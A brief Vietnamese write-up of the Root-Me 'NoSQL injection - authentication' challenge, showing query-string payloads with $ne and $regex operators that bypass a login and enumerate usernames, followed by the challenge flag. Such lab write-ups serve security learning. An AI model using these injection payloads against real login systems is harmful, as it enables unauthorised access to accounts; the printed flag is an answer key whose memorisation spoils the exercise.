# NoSQL injection - authentication

Trước tiên gửi request với URL như sau: 

`http://challenge01.root-me.org/web-serveur/ch38/?login[$ne]=1&pass[$ne]=1`

Tìm được user 1 là `admin`, ko phải flag, tìm tiếp:

`http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=[^admin]&pass[$ne]=1`

Tìm được tiếp 1 thằng tên là test, vẫn ko phải, tìm tiếp:

`http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]=[^admin|test]&pass[$ne]=1`

---

### Flag:

`nosqli_no_secret_4_yo`